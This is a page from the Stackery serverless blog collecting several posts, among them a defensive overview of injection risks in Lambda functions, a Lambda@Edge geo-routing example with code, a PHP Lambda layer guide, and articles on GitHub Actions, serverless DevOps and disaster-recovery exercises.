Stacks on Stacks

The Serverless Ecosystem Blog by Stackery.

Posts on DevOps

Injection Attacks: Protecting Your Serverless Functions
Garrett Gillas

Garrett Gillas | February 28, 2019

Injection Attacks: Protecting Your Serverless Functions

Security is Less of a Problem with Serverless but Still Critical

While trying to verify the claims made on a somewhat facile rundown of serverless security threats, I ran across Jeremy Daly’s excellent writeup of a single vulnerability type in serverless, itself inspired by a fantastic talk from Ory Segal on vulnerabilities in serverless apps. At first I wanted to describe how injection attacks can happen. But the fact is, the two resources I just shared serve as amazing documentation; Ory found examples of these vulnerabilities in active GitHub repos! Instead, it makes more sense to recap their great work before diving into some of the ways that teams can protect themselves.

A Recap on Injection Vulnerability

It might seem like a serverless function just isn’t vulnerable to code injection. After all, it’s just a few lines of code. How much information could you steal from it? How much damage could you possibly do?

The reality is, despite Lambdas running on a highly managed OS layer, that layer still exists and can be manipulated. To put it another way, to be comprehensible and usable to developers of existing web apps, Lambdas need to have the normal abilities of a program running on an OS. Lambdas need to be able to send HTTP requests to arbitrary URLs, so a successful attack will be able to do the same. Lambdas need to be able to load their environment variables, so successful attacks can send all the variables on the stack to an arbitrary URL!

The attack is straightforward enough: inside a user-submitted file name is a string that terminates in an escape-and-terminal command. The careless developer is parsing the files with a terminal command, which results in it being run.

What are the principles at work here?

It’s simple enough to say ‘sanitize your inputs’ but some factors involved here are a bit more complicated than that:

  • Lambdas, no matter how small and simple, can leak useful information
  • There are many sources of events, and almost all of them could include user input
  • With interdependence between serverless resources, user input can come from unexpected angles
  • Alongside many sources of events, event data, and names, information can come in many formats

In case this should seem like a largely theoretical problem, note that Ory’s presentation used examples found in the wild on Github.

Solution 1: Secure Your Functions

On Amazon Web Services (AWS), serverless functions are created with no special abilities within your other AWS resources. You need to give them permissions and connect them up to events from various sources. If your Lambdas need storage, it can be tempting to give them permissions to access your S3 buckets.

In this example from AWS, the permissions given by this policy only cover the two buckets we need for read/write. This is good!

If you’re using lambdas in diverse roles, this means not using single IAM policies for all your lambdas. It’s possible to generalize somewhat and re-use policies, but this takes some monitoring of its own.

How Stackery Can Help

The creation and monitoring of multiple IAM roles for a single stack can get pretty arduous when done manually. I like writing JSON as much as the next person, but multiple permissions can also get tough to manage.

With Stackery, giving functions permissions to access a single bucket or database is as easy as drawing a line.

Even better, the Stackery dashboard makes it easy to see what permissions exist between your resources.

How Twistlock Can Help

Keeping a close eye on your permissions is a great general guideline, but we have to be realistic: dynamic teams need to make large, fast, changes to their stack and mistakes are going to happen. Without some kind of warning that our usual policies have been violated, there’s a good chance that vulnerabilities will go out to production.

Twistlock lets you set overall policies either in sections or system-wide for where traffic should be allowed. It can generate warnings when policies are violated or even block traffic, for example between a lambda that serves public information and a database with Personally Identifiable Information (PII).

Twistlock can also scan memory for suspect strings, meaning that, without any special engineering effort, it can detect when a key is being passed around when it shouldn’t be.

Further Reading

Ory Segal has a blog post on testing for SQL injection in Lambdas using open source tools. Even if you’re not going to roll your own security, it’s a great tour of the nature of the attacks that are possible.

Stackery and Twistlock work great together, in fact, we wrote up a solution brief about it. Serverless architecture is rapidly becoming the best way to roll out powerful, secure applications. Get the full guide here.




Lambda@Edge: Why Less is More
Nuatu Tseggai

Nuatu Tseggai | February 21, 2019

Lambda@Edge: Why Less is More

Lambda@Edge is a compute service that allows you to write JavaScript code that executes in any of the 150+ AWS edge locations making up the Amazon CloudFront content delivery network (CDN) service.

In this post, I’ll provide some background on CDN technologies. I will also build out an application stack that serves country-specific content depending on where the user request originates from. The stack utilizes a Lambda@Edge function which checks the country code of an HTTP request and modifies the URI to point to a different index.html object within an S3 bucket.

TL;DR: Less time, Fewer resources, Less effort

  • CDNs are ubiquitous. Modern websites and applications make extensive use of CDN technologies to increase speed and reliability.
  • Lambda@Edge has some design limitations: Node.JS only, must be deployed through us-east-1, limitations on memory size differ between event types, etc.

Read on for a working example alongside tips and outside resources to inform you of key design considerations as you evaluate Lambda@Edge.

The best of both worlds: Lambda + CloudFront

  • Fully managed: no servers to manage and you never have to pay for idle
  • Reliable: built-in availability and fault-tolerance
  • Low latency: a global network of 160+ Points of Presence in 65 cities across 29 countries (as of early 2019)

A Use Case

You have a website accessed by users from around the world. For users in the United States, you want CloudFront to serve a website with US market-specific information. The same is true for users in Australia, Brazil, Europe, or Singapore and each of their respective markets. For users in any country besides those mentioned above, you want CloudFront to serve a default website.

Stackery will be used to design, deploy, and operate this stack; but the Infrastructure as Code and Lambda@Edge concepts are valid with or without Stackery.

Check out this link to explore many of the other use cases such as:

  • A/B testing
  • User authentication and authorization
  • User prioritization
  • User tracking and analytics
  • Website security and privacy
  • Dynamic web application at the edge
  • Search engine optimization (SEO)
  • Intelligently route cross origins and data centers
  • Bot mitigation at the edge
  • Improved user experience (via personalized content)
  • Real-time image transformation

Background: Need for Speed

Traffic on the modern Internet has been growing at a breakneck rate over the last two decades. This growth in traffic is being fueled by nearly 4 billion humans with an Internet connection. It’s estimated that more than half of the world’s traffic is now coming from mobile phones and that video streaming accounts for 57.69% of global online data traffic. Netflix alone is responsible for 14.97% of the total downstream volume of traffic across the entire internet! The other half comes from web browsing, gaming, file sharing, connected devices (cars, watches, speakers, TVs) Industrial IoT, and back-end service-to-service communications.

To keep pace with this rate of growth, websites owners and Internet providers have turned to CDN technologies to cache web content on geographically dispersed servers at edge locations around the world. Generally speaking, these CDN’s serve HTTP requests by accepting the connection at an edge location in close proximity to the user (latency-wise), organizing the request into phases, and caching the response content so that the aggregate user experience is fast, secure, and reliable.

When done correctly, the result is a win-win. The end user can expect faster load times, a lighter load on the origin server, and backhaul portion of the major telecommunications networks (ie: the intermediate links between the core network, backbone network, and subnetworks at the edge of the network).

For more background, check out the What is a CDN page from CloudFlare and this Amazon CloudFront Key Features page from AWS.

Lambda@Edge

Lambda@Edge is a relatively new feature (circa 2017) of CloudFront which enables the triggering of Lambda functions by any of the following four CDN events.

Viewer Request

Edge Function is invoked when the CDN receives a request from an end user. This occurs before the CDN checks if the requested data is in its cache.

Origin Request

Edge Function is invoked only when the CDN forwards a request to your origin. If the requested data is in the CDN cache, the Edge Function assigned to this event does not execute.

Origin Response

Edge Function is invoked when the CDN receives a response from your origin. This occurs before the CDN caches the origin’s response data. An Edge Function assigned to this event is triggered even if the origin returns an error.

Viewer Response

Edge Function is invoked when the CDN returns the requested data to the end user. An Edge Function assigned to this event is triggered regardless of whether the data is already present in the CDN’s cache.

When deciding which CDN event should trigger your Edge Function, consider these questions from the AWS Developer Guide, as well as additional clarifying questions from this helpful AWS blog post in the “Choose the Right Trigger” section.

Sample Source

The source code for this project is available from my GitHub.

Template Generation

I used the Stackery editor to lay out the components and generate a template:

The template is available in the Git repo as template.yaml.

This application stack is pretty straightforward: a CDN is configured to serve a default index.html from an S3 bucket and the CDN is also configured to trigger a Lambda@Edge function upon any Origin Request events. Origin Requests are only made when there is a cache miss, but in the context of this application stack, cache misses will be rare. The default TTL for files in CloudFront is 24 hours— depending on your needs, you can reduce the duration to serve dynamic content or increase the duration to get better performance. The latter will also lower the cost because your file is more likely to be served from an edge cache, thus reducing load on your origin.

Pay special attention to lines 11-12 within the infrastructure as code template. These lines configure the CDN to cache based on the CloudFront-Viewer-Country header which is added by CloudFront after the viewer request event.

Also, note that line 23 which specifies the “Price Class 200” for the CDN (which enables content to be delivered from all AWS edge regions except South America). Price Class All is the most expensive which enables content to be delivered from all AWS regions (this is the default if no other price class is specified). Price Class 100 is the cheapest and only delivers content from United States & Canada and Europe. For more information on pricing check out this link.

Lambda@Edge Function

The Lambda@Edge function checks if the country code of the request is AU, BR, EU, SG, or US. If it is, the URI of the HTTP request is modified to point to a specific index.html object (such as au/index.html or us/index.html) within the S3 bucket. The default index.html object is served from S3 bucket if the country code is NOT one of the above five.

Here’s the complete function code: index.js

'use strict'

exports.handler = async (event) => {
    const request = event.Records[0].cf.request
    const headers = request.headers

    console.log(JSON.stringify(request))
    console.log(JSON.stringify(request.uri))

    const auPath = '/au'
    const brPath = '/br'
    const euPath = '/eu'
    const sgPath = '/sg'
    const usPath = '/us'

    if (headers['cloudfront-viewer-country']) {
        const countryCode = headers['cloudfront-viewer-country'][0].value
        if (countryCode === 'AU') {
          request.uri = auPath + request.uri
        } else if(countryCode === 'BR') {
          request.uri = brPath + request.uri
        } else if (countryCode === 'EU') {
          request.uri = euPath + request.uri
        } else if (countryCode === 'SG') {
          request.uri = sgPath + request.uri
        } else if (countryCode === 'US') {
          request.uri = usPath + request.uri
        }
    }
    console.log(`Request uri set to "${request.uri}"`)

    return request
}

Deployment

Of course, Stackery makes it simple to deploy this application into AWS, but it should be pretty easy to give the template directly to CloudFormation. You may want to go through and whack the parameters like ‘StackTagName’ that are added by the Stackery runtime.

Once the deployment is complete, the provisioned CDN distribution will have a DNS address. I deployed this application to several different environments, one of which I have defined as staging. Here’s the DNS address of that distribution: https://d315q2a48nys0i.cloudfront.net/

Lastly, go to the newly created S3 bucket and add this default index.html file to the root of the S3 bucket. Then create the following 5 “folders” in the S3 bucket: au, br, eu, sg, us. I put folders in quotes because it’s not technically a folder, but via the UI, S3 refers to them as folders and allows them to be created as such. Once each folder is created, add the respective index.html that I have saved in this /html directory within this github project (ie: For the au bucket, copy over the index.html that I have saved at /html/au/index.html). The AWS CLI is convenient for this type of copying/syncing, check out this link for tips pertaining to managing S3 buckets and objects from the command line.

If I hit the DNS address of the CDN distribution from Portland Oregon, I see the following:

See How it Appears to the Rest of the World

GeoPeeker is a pretty nifty tool that allows you to see how a site appears to the rest of the world. Just go to this link and geopeeker will show the site I’ve deployed as it appears to users in Singapore, Brazil, Virginia, California, Ireland, and Australia.

Conclusion

I encourage you to explore the shape of the request event object as well as the response event object both of which can be found at this link. At one point prior to finding this page, I was getting my wires crossed in terms of the values available on each object. Once I found it, I was able to instantly get back on track and hone in on the URI value that I wanted to modify.

An alternative implementation to the changing the URI is to change the host. In that scenario, I could have created a separate S3 bucket for the default site and separate S3 buckets for the index.html for each of the 5 countries, then upon each Origin Request, modify the host instead of the URI when I found a match. Perhaps I’ll do that in a follow on post to show the difference in the resulting Infrastructure as Code template and Lambda@Edge function.

The use case I covered is relatively approachable. More advanced use cases, such as securing sites and applications from bots or DDOS attacks, would be really interesting and fun to implement using Lambda@Edge. It would be great to see more blog posts and/or reference implementations based on reproducible Infrastructure as Code samples that show Lambda@Edge based solutions that target A/B testing, analytics, and user authentication and authorization. Let me know on twitter or in the comments which types of use cases your interested in and I’ll work to put them together or coordinate with various serverless experts to bring the solutions to life.

PHP on Lambda? Layers Makes it Possible!
Nuatu Tseggai

Nuatu Tseggai | November 29, 2018

PHP on Lambda? Layers Makes it Possible!

AWS’s announcement of Lambda Layers means big things for those of us using serverless in production. The creation of set components that can be included with any number of Lambdas means you no longer have to zip up your application code and all its dependencies each time you deploy a serverless stack. This allows you to include dependencies that are much more bespoke to your particular serverless environment.

In order to enable Stackery customers with Layers at launch, we took a look at Lambda Layers use cases. I also decided to go a bit further and publish a layer that enables you to write a Lambda in PHP. Keep in mind that this is an early iteration of the PHP runtime Layer, which is not yet ready for production. Feel free to use this Layer to learn about the new Lambda Layers feature and begin experimenting with PHP functions and send us any feedback; we expect this will evolve as the activity around proof of concepts expands.

What does PHP do?

PHP is a pure computing language and you can use to emulate the event processing syntax of a general-purpose Lambda. But really, PHP is used to create websites, so Chase’s implementation maintains that model: your Lambda accepts API gateway events and processes them through a PHP web server.

How do you use it?

Configure your function as follows:

  1. Set the Runtime to provided
  2. Determine the latest version of the layer: aws lambda list-layer-versions --layer-name arn:aws:lambda:<your 3. region>:887080169480:layer:php71
  3. Add the following Lambda Layer: arn:aws:lambda:<your region>:887080169480:layer:php71:<latest version>

If you are using AWS SAM it’s even easier! Update your function:

Resources:
  MyFunction:
    Type: AWS::Serverless::Function
    Properties:
      ...
      Runtime: provided
      Layers:
        - !Sub arn:aws:Lambda:${AWS::Region}:887080169480:layer:php71

Now let’s write some Lambda code!

<?php
header('Foo: bar');
print('Request Headers:');
print_r(getallheaders());
print('Query String Params:');
print_r($_GET);
?>

Hi!

The response you get from this code isn’t very well formatted, but it does contain the header information passed by the API gateway:

If you try anything other than the path with a set API endpoint response, you’ll get an error response that the sharp-eyed will recognize as being from the PHP web server, which as mentioned above is processing all requests

Implementation Details

Layers can be shared between AWS accounts, which is why the instructions above for adding a layer works: you don’t have to create a new layer for each Lambda. Some key points to remember:

  • A layer must be published on your region
  • You must specify the version number for a layer
  • For the layer publisher, a version number is an integer that increments each time you deploy your layer

How Stackery Makes an Easy Process Easier

Stackery can improve every part of the serverless deployment process, and Lambda Layers are no exception. Stackery makes it easy to configure components like your API gateway.

Stackery also has integrated features in the Stackery Operations Console, which lets you add layers to your Lambda:

Conclusions

Lambda Layers offers the potential for more complex serverless applications making use of a deep library of components, both internal to your team and shared. Try adding some data variables or a few npm modules as a layer today!

GitHub Actions: Automating Serverless Deployments
Toby Fee

Toby Fee | November 20, 2018

GitHub Actions: Automating Serverless Deployments

The whole internet is abuzz over GitHub Actions, if by ‘whole internet’ you mean ‘the part of the internet that is obsessed with serverless ops’ and by ‘abuzz’ you mean ‘aware of‘.

But Actions are a bit surprising! GitHub is a company that has famously focused on doing a single thing extremely well. As the ranks of developer-tooling SaaS companies swells by the day, you would think GitHub would have long ago joined the fray. Wouldn’t you like to try out a browser-based IDE, CI/CD tools, or live debugging tools, with the GitHub logo at the top left corner?

With the GitHub Actions product page promising to let you build your own ‘workflow’ from private and shared ‘actions’ in any order you want, with each action to be run in its own docker container, the whole thing configured with a simple-but-powerful scripting logic; GitHub Actions feels like a big ambitious expansion of the product. Could this be the influence of notoriously over ambitious new leadership at Microsoft?

In reality GitHub Actions are a powerful new tool for expanding what you do based on GitHub events and nothing else!

What can it do?

A lot! Again in the realm of ‘doing something to your repo when something happens to your repo. Some use cases that stand out:

  • Build your assets when you commit to Master
  • Raise alerts for critical issues
  • Take some custom action when commits get comments
  • Notify stakeholders when feature branches are merged to production

What can’t it do?

A whole lot! Workflows can’t:

  • Respond to anything other than GitHub repo events (you can’t send a request from anywhere else to kick off a workflow)
  • Take more than an hour
  • Have more than 100 actions - a limitation that seems pretty minor since actions can do arbitrarily large tasks

Overall Impressions

GitHub Actions are definitely a step in the right direction, since both the configuration for a workflow and the docker images for each action can all be part of a single repo managed like others code. And as I and others have often harped on: one should always prefer managing code over managing config. GitHub Actions increases the likelihood that your whole teams will be able to see how the workflow around your code is supposed to work, and that’s an unalloyed benefit to your team.

“I’m sold, GitHub Actions forever! I’ll add them to master tomorrow.”

Bad news sport, GitHub Actions are on a beta with a waitlist and while GitHub has its sight set on integrating actions with your production process, a warning at the top of the developer guide explicitly states that GitHub Actions isn’t ready to do that.

So for now head on over and get on the waiting list for the feature, and try it out with your dev branches sometime soon.

GitHub makes no secret of the fact that Actions replace the task of building an app to receive webhooks from your repository. If you’d like to build an app in the simplest possible structure, my coworker Anna Spysz wrote about how to receive GitHub webhooks in just a few steps. Further, using Stackery makes it easy to hook your app up to a docker container to run your build tasks.

The Case for Minimalist Infrastructure
Garrett Gillas

Garrett Gillas | November 13, 2018

The Case for Minimalist Infrastructure

If your company could grow its engineering organization by 40% without increasing costs, would they do it? If your DevOps team could ship more code and features with fewer people, would they want to? Hopefully, the answer to both of these questions is ‘yes’. At Stackery, we believe in helping people create the most minimal application infrastructure possible.

Let me give you some personal context. Last year, I was in charge of building a web application integrated with a CMS that required seven virtual machines, three MongoDBs, a MySQL database and CDN caching for production. In addition, we had staging and dev environments with similar quantities of infrastructure. Over the course of 2 weeks, we were able to work with our IT-Ops team to get our environments up and running and start building the application relatively painlessly.

At Stackery, we saw a big opportunity that allows software teams to spend less time on infrastructure, and more time building software.

After we got our application running, something happened. Our IT-Ops team went through their system hardening procedure. For those outside the cybersecurity industry, system hardening can be defined as “securing a system by reducing its surface of vulnerability”. This often includes things like changing default passwords, removing unnecessary software, unnecessary logins, and the disabling or removal of unnecessary services. This sounds fairly straightforward, but it isn’t.

In our case, it involved checking our system against a set of rules like this one for Windows VMs and this one for Linux. Because we cared about security, this included closing every single port on every single applicant that was not in use. As the project lead, I discovered three things by the end.

  • We had spent much more people-hours on security and ops than on development.
  • Because there were no major missteps, this was nobody’s fault.
  • This should never happen.

Every engineering manager should have a ratio in their head of work hours spent in their organization on software engineering vs other related tasks (ops, QA, product management, etc…). The idea is that organizations that spend the majority of their time actually shipping code will perform better than groups that spend a larger percentage of their time on operations. At this point, I was convinced that there had to be a better way.

Serverless Computing

There have been many attempts since the exodus to the cloud to make infrastructure easier to manage in a way that requires fewer personnel hours. We came from bare-metal hardware to datacenter VMs, then VMs in the cloud and later containers.

In November 2014 Amazon Web Services announced AWS Lambda. The purpose of Lambda was to simplify building on-demand applications that are responsive to events and data. At Stackery, we saw a big opportunity that allows software teams to spend less time on infrastructure, and more time building software. We have made it our mission to make it easier for software engineers to build highly-scalable applications on the most minimal, modern cloud infrastructure available.

Five Ways Serverless Changes DevOps
Sam Goldstein

Sam Goldstein | October 31, 2018

Five Ways Serverless Changes DevOps

I spent last week at DevOps Enterprise Summit in Las Vegas where I had the opportunity to talk with many people from the world’s largest companies about DevOps, serverless, and the ways they are delivering software faster with better stability. We were encouraged to hear of teams using serverless from cron jobs to core bets on accelerating digital transformation initiatives.

Lots of folks had questions about what we’ve learned running the serverless engineering team at Stackery, how to ensure innovative serverless projects can coexist with enterprise standards, and most frequently, how serverless changes DevOps workflows. Since I now have experience building developer enablement software out of virtual machines, container infrastructures, and serverless services I thought I’d share some of the key differences with you in this post.

Developers Need Cloud-Side Environments to Work Effectively

At its core, serverless development is all about combining managed services in the cloud to create applications and microservices. The serverless approach has major benefits. You can move incredibly fast, outsourcing tons of infrastructure friction and orchestration complexity.

However, because your app consists of managed services, you can’t run it on your laptop. You can’t run the cloud on your laptop.

Let’s pause here to consider the implications of this. With VMs and containers, deploying to the cloud is part of the release process. New features get developed locally on laptops and deployed when they’re ready. With serverless, deploying to the cloud becomes part of the development process. Engineers need to deploy as part of their daily workflow developing and testing functionality. Automated testing generally needs to happen against a deployed environment, where the managed service integrations can be fully exercised and validated.

This means the environment management needs of a serverless team shift significantly. You need to get good at managing a multitude of AWS accounts, developer specific environments, avoiding namespace collisions, injecting environment specific configuration, and promoting code versions from cloud-side development environments towards production.

Note: While there are tools like SAM CLI and localstack that enable developers to invoke functions and mimic some managed services locally, they tend to have gaps and behave differently than a cloud-side environment.

Infrastructure Management = Configuration Management

The serverless approach focuses on leveraging the cloud provider do more of the undifferentiated heavy lifting of scaling the IT infrastructure, freeing your team to maintain laser focus on the unique problems which your organization solves.

To repeat what I wrote a few paragraphs ago, serverless teams build applications by combining managed services that have the most desirable scaling, cost, and durability characteristics. However, here’s another big shift. Developers now need familiarity with a hefty catalog of services. They need to understand their pros and cons, when to use each service, and how to configure each service correctly.

A big part of solving this problem is to leverage Infrastructure as Code (IaC) to define your serverless infrastructure. For serverless teams this commonly takes the form of an AWS Serverless Application Model (SAM) template, a serverless.yml, or a CloudFormation template. Infrastructure as Code provides the mechanism to declare the configuration and relationships between the managed services that compose your serverless app. However, because serverless apps typically involve coordinating many small components (Lambda functions, IAM permissions, API & GraphQL gateways, datastores, etc.) the YAML files containing the IaC definition tend to balloon to hundreds (or sometimes thousands) of lines, making it tedious to modify and hard to keep consistent with good hygiene. Multiply the size and complexity of a microservice IaC template by your dev, test, and prod environments, engineers on the team, and microservices; you quickly get to a place where you will want to carefully consider how they’ll manage the IaC layer and avoid being sucked into YAML hell.

Microservice Strategies Are Similar But Deliver Faster

Serverless is now an option for both new applications and refactoring monoliths into microservices. We’ve seen teams deliver highly scalable, fault-tolerant services in days instead of months to replace functionality in monoliths and legacy systems. We recently saw a team employ the serverless strangler pattern to transition a monolith to GraphQL serverless microservices, delivering a production ready proof of concept in just under a week. We’ve written about the Serverless Strangler Pattern before on the Stackery blog, and I’d highly recommend you consider this approach to technical transformation.

A key difference with serverless is the potential to eliminate infrastructure and platform provisioning cycles completely from the project timeline. By choosing managed services, you’re intentionally limiting yourself to a menu of services with built-in orchestration, fault tolerance, scalability, and defined security models. Building scalable distributed systems is now focused exclusively on the configuration management of your infrastructure as code (see above). Just whisper the magic incantation (in 500-1000 lines of YAML) and microservices spring to life, configured to scale on demand, rather than being brought online through cycles of infrastructure provisioning.

Regardless of platform, enforcing cross-cutting operational concerns when the number of services increases is a (frequently underestimated) challenge. With microservices it’s easy to keep the pieces of your system simple, but it’s hard to keep them all consistent as the number of pieces grows.

What cross-cutting concerns need to be kept in sync? It’s things like:

  • access control
  • secrets management
  • environment configuration
  • deployment
  • rollback
  • auditability
  • so many other things…

Addressing cross-cutting concerns is an area many serverless teams struggle, sometimes getting bogged down in a web of inconsistent tooling, processes, and visibility. However the serverless teams that do master cross-cutting effectively are able to deliver on microservice transformation initiatives much faster than those using other technologies.

Serverless is Innovating Quickly

Just like serverless teams, the serverless ecosystem is moving fast. Cloud providers are pushing out new services and features every day. Serverless patterns and best practices are undergoing rapid, iterative evolution. There are multiple AWS product and feature announcements every day. It’s challenging to stay current on the ever expanding menu of cloud managed services, let alone best practices.

Our team at Stackery is obsessed with tracking changes in the serverless ecosystem, identifying best practices, and sharing these with the serverless community. AWS Secrets Manager, easy authorization hooks for REST APIs in AWS SAM, 15 minute Lambda timeouts, and AWS Fargate Containers are just a few examples of recent serverless ecosystem changes our team is using. Only a serverless team can keep up with a serverless team. We have learned a lot of lessons, some of them the hard way, about how to do serverless right. We’ll keep refining our serverless approach and can honestly say we’re moving faster and with more focus than we’d ever thought possible.

Patching and Capacity Distractions Go Away (Mostly)

Raise your hand if the productivity of your team ever ground to a halt because you needed to fight fires or were blocked waiting for infrastructure to be provisioned. High profile security vulnerabilities are being discovered all the time. The week Heartbleed was announced a lot of engineers dropped what they had been working on to patch operating systems and reboot servers. Serverless teams intentionally don’t manage OS’s. There’s less surface area for them to patch, and as a result they’re less likely to get distracted by freshly discovered vulnerabilities. This doesn’t completely remove a serverless team’s need to track vulnerabilities in their dependencies, but it does significantly scope them down.

Capacity constraints are a similar story. Since serverless systems scale on demand, it’s not necessary to plan capacity in a traditional sense, managing a buffer of (often slow to provision) capacity to avoid hitting a ceiling in production. However serverless teams do need to watch for a wide variety AWS resource limits and request increases before they are hit. It is important to understand how your architecture scales and how that will effect your infrastructure costs. Instead of your system breaking, it might just send you a larger bill so understanding the relationship between scale, reliability, and cost is critical.

As a community we need to keep pushing the serverless envelope and guiding more teams in the techniques to break out of technical debt, overcome infrastructure inertia, embrace a serverless mindset, and start showing results they never knew they could achieve.

The '8 Fallacies of Distributed Computing' Aren't Fallacies Anymore
Apurva Jantrania

Apurva Jantrania | October 23, 2018

The '8 Fallacies of Distributed Computing' Aren't Fallacies Anymore

In the mid 90’s, centralized ‘mainframe’ systems were in direct competition with microcomputing for dominance of the technology marketplace and developers’ time. Peter Deutsch, a Sun Microsystems engineer who was a ‘thought leader’ before we had the term, wrote seven fallacies that many developers assumed about distributed computing, to which James Gosling added one more to make the famous list of The 8 Fallacies of Distributed Computing.

  1. The network is reliable
  2. Latency is zero
  3. Bandwidth is infinite
  4. The network is secure
  5. Topology doesn’t change
  6. There is one administrator
  7. Transport cost is zero
  8. The network is homogeneous

Microcomputing would win that debate in the 90’s, with development shifting to languages and platforms that could be run on a single desktop machine. Twenty years later we’re still seeing these arguments used against distributed computing, especially against the most rarefied version of distributed computing, serverless. Recently, more than one person has replied to these fallacies by saying they ‘no longer apply’ or ‘aren’t as critical’ as they once were, but the truth is none of these are fallacies any more.

How can these fallacies be true? There’s still latency and network vulnerabilities.

Before about 2000, the implied comparison with local computing didn’t need to be stated: “The network is more reliable than your local machine…” was obviously a fallacy. But now that assumption is the one under examination. Networks still have latency, but the superiority of local machines over networks is now either in doubt or absent.

1. The Network is Reliable

This is a pretty good example of how the list of fallacies ‘begs the question.’ What qualifies as ‘reliable?’ Now that we have realistic stats about hard drive failure rates, even a RAID-compliant local cluster has some failure rate.

2. Latency is Zero

Latency is how much time it takes for data to move from one place to another (versus bandwidth, which is how much data can be transferred during that time). The reference here is to mainframe ‘thin client’ systems where every few keystrokes had to round-trip to a server over an unreliable, laggy network.

While our networking technology is a lot better, another major change ha been effective AJAX and async tools that check in when needed and show responsive interfaces all the time. On top of a network request structure that hasn’t been much updated since the 90’s, and a browser whose memory needs seem to double annually, we still manage to run cloud IDE’s that perform pretty well.

3. Bandwidth is Infinite

Bandwidth still costs something, but beyond the network improvements mentioned above, the cost of bandwidth has become extremely tiny. While bills for bandwidth do exist, and I’ve even seen some teams optimize to try and save on their bandwidth costs!

In general this costs way more in developer wages than it saves, and brings us to the key point. Bandwidth still costs money, but the limited resource is not technology but people. You can buy a better network connection at 2AM on a Saturday, but you cannot hire a SQL expert who can halve your number of DB queries.

4. The Network is Secure

As Bloomberg struggles to back up its reports of a massive hardware bugging attack against server hardware, many people want to return to a time when network’s were inherently untrustworthy. More accurately, since few developers can do their jobs without constant network access for at least Github and NPM, untrustworthy networks are an easy scapegoat for poor operational security practices that almost everyone commits.

The Dimmie attack which peaked in 2017 targeted the actual spot where most developers are vulnerable: their laptops. With enough access to load in-memory modules on your home machine, attackers can corrupt your code repos with malicious content. In a well-run dev shop it’s the private computing resources that tend to be entry points for malicious attacks. The laptops that we take home with us for personal use that should be the least trustworthy component.

5. Topology Doesn’t Change

With the virtualization options available in something serverless like AWS’s Relational Database Service (RDS), it’s likely that topology never has to change from the point of view of the client. On a local or highly controlled environment there are setups where no DB architectures, interfaces, or request structures have changed in years. This is called ‘Massive Tech Debt’.

6. There is One Administrator

If this isn’t totally irrelevant (no one works on code that has a single human trust source anymore, or if they do that’s… real bad get a second Github admin please), it might still be a reason to use serverless and not roll your own network config.

For people just dipping a toe in to managed services, there are still horror stories about the one single AWS admin leaving for 6 weeks of vacation, deciding to join a monastery, and leaving the dev team unable to make changes. In those situations where there wasn’t much consideration of the ‘bus factor’ on your team there still is just one administrator it’s the service provider and as long as you’re the one paying for the service you can wrest back control.

7. Transport Cost is Zero

Yes, transport cost is zero. This one is just out of date.

8. The Network is Homogeneous

Early networked systems had real issues with this, I am reminded of the college that reported they could only send emails to places within 500 miles, there are ‘special places’ in a network that can confound your tests and your general understanding of the network.

This fallacy isn’t so much true as now the awkward parts of a network are clearly labelled as such. CI/CD is explicitly testing in a controlled environment, and even AWS which does its darndest to present you with a smooth homogenous system intentionally makes you aware of geographic zones.

Conclusions

We’ve all seen people on Twitter pointing out an AWS outage shouting how this means we should ‘not trust someone else’s computer’ but I’ve never seen an AWS-hosted service have 1/10th the outages of a self-hosted services. Next time someone shares a report of a 2 hour outage in a single Asian AWS region, ask to see their red team logs from the last 6 months.

At Stackery, we have made it our mission to make modern cloud infrastructure as accessible and useful as possible. Get your engineering team the best solution for building, managing and scaling serverless applications with Stackery today.

Disaster Recovery in a Serverless World - Part 3
Nuatu Tseggai

Nuatu Tseggai | October 18, 2018

Disaster Recovery in a Serverless World - Part 3

This is part three of a multi-part blog series. In the first post we covered Disaster Recovery planning when building serverless applications and in the second post we covered the systems engineering needed for an automated solution in the AWS cloud. In this post, we’ll discuss the end-to-end Disaster Recovery exercise we performed to validate the plan.

The time has come to exercise the Disaster Recovery plan. The objective of this phase is to see how closely the plan correlates to the current reality of your systems and to identify areas for improvement. In practice, this means assembling a team to conduct the exercise and documenting the process within the communication channel you outlined in the plan.

Background

In the first post you’ll find an outline of the plan that we’ll be referencing in this exercise. Section 2 describes the process of initiating the plan and assigning roles and Section 3 describes the communication channels used to keep stakeholders in sync.

Set the Stage

Decide who will be involved in the exercise, block out a chunk of time equivalent to the Recovery Time Objective, and create the communication channel in Slack (or whatever communication tool that your organization utilizes; ie: Google Hangouts, Skype, etc).

Create a document to capture key information relevant to the Disaster Recovery exercise such as who is assigned which roles, the AWS regions in play, and most importantly, a timeline pertaining to the initiation and completion of each recovery step. Whereas the Disaster Recovery plan is a living document to be updated over time, the Disaster Recovery exercise document mentioned here is specific to the date of the exercise; ie: Disaster Recovery Exercise 20180706.

Conduct the Exercise

Enter the communication channel and post a message that signals the start of the exercise immediately followed by a message to the executive team to get their approval to initiate the Disaster Recovery plan.

Upon completion of the exercise, post a message that signals the end of the exercise.

Key Takeaways

  1. Disaster Recovery exercises can be stressful. Be courteous and supportive to one another.
  2. High performance teams develop trust through practicing to communicate effectively. Lean towards communication that is both precise and unambiguous. This is easier said than done but gets easier through experience. Over time, the Disaster Recovery plan and exercise will become self reinforcing.
  3. Don’t forget to involve a representative of the executive team. This is to ensure that the operational status is being communicated across all levels.
  4. Be clear on which AWS region represents the source and which AWS region represents the DR target.
  5. Research and experiment with the options you have available to automate DNS changes. Again, the key here is gaining the skills and confidence through testing and optimizing for fast recovery. Know your records (A and CNAME) and the importance of TTL.
  6. Verify completion of recovery from the perspective of a customer.
  7. Conduct a retrospective to illuminate areas for improvement or research. Ask questions that encourage participants to openly discuss both the technical and psychological aspects of the exercise.

Get the Serverless Development Toolkit for Teams

now and get started for free. Contact one of our product experts to get started building amazing serverless applications today.

To Top